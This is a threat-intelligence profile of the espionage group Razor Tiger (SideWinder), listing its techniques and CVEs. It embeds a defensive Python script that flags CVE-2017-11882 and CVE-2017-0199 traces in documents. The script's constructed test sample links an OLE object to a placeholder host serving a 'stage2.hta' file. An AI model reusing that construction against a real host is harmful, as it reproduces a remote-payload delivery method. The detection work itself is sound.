Threat Actor Profile
Razor Tiger
Razor Tiger, also known as SideWinder, APT-C-17, and Rattlesnake, is a nation-state-sponsored threat actor active since at least 2012. Believed to operate from India, the group specializes in cyber-espionage targeting military, government, and maritime sectors. Razor Tiger employs spear-phishing, fileless malware, and advanced infrastructure to achieve its objectives.
Country of Origin
Razor Tiger is strongly suspected to originate from India, based on linguistic, operational, and geopolitical indicators. However, definitive attribution remains challenging.
Members
The exact size and composition of Razor Tiger are unclear. The group is believed to operate as a tightly-knit unit with access to significant resources, suggesting state sponsorship.
Leadership
The leadership of Razor Tiger remains unknown.
Razor Tiger TTPs
Tactics
The group focuses on intelligence gathering, targeting national defense, diplomatic, and critical infrastructure sectors.
Techniques
Razor Tiger leverages spear-phishing emails, malicious Office documents, and fileless malware to infiltrate targets. Exploited vulnerabilities include CVE-2017-11882 and CVE-2017-0199.
Procedures
The group uses multi-stage loaders, obfuscated JavaScript, and modular implants like StealerBot and WarHawk. Command-and-control (C2) infrastructure includes over 400 domains and dynamic subdomains.
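The two document-based techniques listed under Techniques leave recognisable traces in the file itself, which is what a triage script can look for before a document is opened. The following Python check is an added example written for this profile, not Huntress tooling; the RTF and OOXML samples are constructed inline, the marker list is an assumption about typical artefacts (the "Equation.3" ProgID and the Equation Editor CLSID for CVE-2017-11882, an externally linked OLE relationship or `\objupdate` for CVE-2017-0199), and the URL is a placeholder.

```python
import io
import re
import zipfile

# Indicators assumed for the two techniques. The hex string is the little-endian
# encoding of the Equation Editor class {0002CE02-0000-0000-C000-000000000046}
# as it appears inside RTF \objdata streams.
EQNEDT_MARKERS = (b"equation.3", b"equation native",
                  b"02ce020000000000c000000000000046")
REL_TAG = re.compile(rb"<Relationship\b[^>]*>", re.I)


def _is_external_ole(tag: bytes) -> bool:
    """An OLE relationship whose target lives outside the package (CVE-2017-0199 pattern)."""
    return b"/oleObject" in tag and re.search(rb'TargetMode="External"', tag, re.I) is not None


def scan_document(data: bytes) -> list[str]:
    """Return findings for a document given as raw bytes (RTF or OOXML zip)."""
    findings = []
    low = data.lower()
    if data.startswith(b"{\\rtf"):
        if any(m in low for m in EQNEDT_MARKERS):
            findings.append("RTF: Equation Editor object present (CVE-2017-11882 pattern)")
        if b"\\objupdate" in low:
            findings.append("RTF: \\objupdate forces OLE activation on open (CVE-2017-0199 pattern)")
        return findings
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                content = zf.read(name)
                if name.endswith(".rels") and any(_is_external_ole(t) for t in REL_TAG.findall(content)):
                    findings.append(f"OOXML: {name} links an OLE object to an external target (CVE-2017-0199 pattern)")
                if "/embeddings/" in name and any(m in content.lower() for m in EQNEDT_MARKERS[:2]):
                    findings.append(f"OOXML: {name} is an Equation Editor object (CVE-2017-11882 pattern)")
    except zipfile.BadZipFile:
        findings.append("Not RTF and not a valid OOXML container")
    return findings


def sample_docx() -> bytes:
    """Constructed OOXML package carrying both indicators; not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels",
                    '<Relationships><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/'
                    'officeDocument/2006/relationships/oleObject" Target="http://placeholder.invalid/'
                    'stage2.hta" TargetMode="External"/></Relationships>')
        zf.writestr("word/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0Equation.3" + b"\x00" * 16)
    return buf.getvalue()


# Constructed RTF fragment: an embedded Equation.3 object that updates on open.
SAMPLE_RTF = b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}{\\*\\objdata 0105000002000000}}}"
```

Run `scan_document(open(path, "rb").read())` over inbound attachments and alert on any finding; a benign legacy equation document will also trip the 11882 check, so treat it as a triage queue rather than an automatic block.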
Notable Cyberattacks
- 2013: Phishing attack on the Indian Embassy in Kabul, leading to data exfiltration.
- 2024: Targeted maritime facilities in the Mediterranean using geofenced payloads.
- 2025: Breach of Pakistan's Cabinet Division with kernel-level malware.
Law Enforcement & Arrests
No arrests or direct law enforcement actions against Razor Tiger have been reported.
How to Defend Against Razor Tiger
Monitor IOCs: Regularly update threat intelligence feeds.
Patch Systems: Address vulnerabilities like CVE-2017-11882.
Use Multi-Factor Authentication: Strengthen access controls.